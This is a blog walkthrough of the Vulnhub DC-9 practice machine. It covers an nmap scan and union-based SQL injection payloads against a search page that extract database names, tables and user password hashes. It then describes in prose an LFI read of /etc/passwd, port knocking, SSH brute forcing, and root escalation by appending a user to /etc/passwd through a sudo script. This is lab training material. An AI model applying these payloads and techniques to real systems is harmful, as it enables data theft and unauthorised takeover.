Vulnhub-DC 9

ARZ101
6 min readMay 16, 2021

This is a walkthrough for the DC 9 from the DC vulnhub series, this machine was a real challenge which involved a port which was filtered and getting the admin hash via SQL injection , then logging in we could find the LFI parameter to get port knocking sequence then further dumping the database to passwords for user and brute forcing them to login.

NMAP

nmap -sC -sV 192.168.1.7Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-16 09:31 PKT
Nmap scan report for 192.168.1.7
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 08:00:27:1B:8F:38 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Going to Display All Records

we can see information of users

We can a login page , lets’ try to do some basic sqli stuff

I tried admin ' or 1=1 # , admin' or 1=1 -- , but both failed

Going over to search.php we can see that it searches for a name so let's supply the name mary since information for that user exists

Here let’s perform a query mary' and 1=1 # to see if it still returns us information of mary

It does , so here we can actually sqli but first we need to identify how many columns are there to do that we are going to utilize order by <number> which will sort by value of the number of column of provide , we will keep increasing the number we get no response so,

mary' order by 1 #

I kept getting result till till 6 columns but after that I get no response

Which means we have 6 columns so we can now perform sql injection

mary' union select version(),user(),database(),4,5,6 #

This machine is using MariaDB, user for the database client is dbuser and the database name is Staff , now we need to extract table name ,then the columns and the exfiltrate the data

We can only perform a query to give us all the names for database

mary' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata #

So there two databases but right now let’s just focus on Staff

mary' union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database() #

We have two tables , StaffDetails and Users so let's see column names for Users table

mary' union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name='Users' #

We have the column names , we are interested in username and password so let’s just extract the data

And we got the user name password hash , this could have been done with sqlmap easily by just intercepting the request from search.php and saving it to a file and running it against sqlmap

Let’s visit crackstation

As soon as we log in we’ll get an error

I tried the parameter file and got the contents of /etc/passwd

So I copied the results in a file and grab the users only

Now remember that we had 2 databases Staff and users , let's use sqlmap to dump data from users database

I have already saved the usernames ,let’s just grab the password and start brute forcing against SSH

But ssh is filtered so we are going to first see if we can find a port knocking configuration or not

Now can perform port-knocking to open ssh port

We found 2 passwords with brute forcing

After logging in with janitor we can find more passwords

Let’s add those passwords and again try brute forcing

Switching to user fredf we can that can run the file test as sudo

It’s a binary , let’s try to execute it and see what happens

Weird it says test.py which is a python file which reads and appends so we need to find that python file

And we found it

So going through the source code , it’s going to take 2 arguments as file , it’s going to read the contents from first file store it in variable then it’s going to append the contents in the file we specify we could exploit this by first adding a root user in a file then reading the contents from there and appending it to /etc/passwd file

Now let’s see if this actually worked or not

This has added a user so we can switch to this user and become root

--

--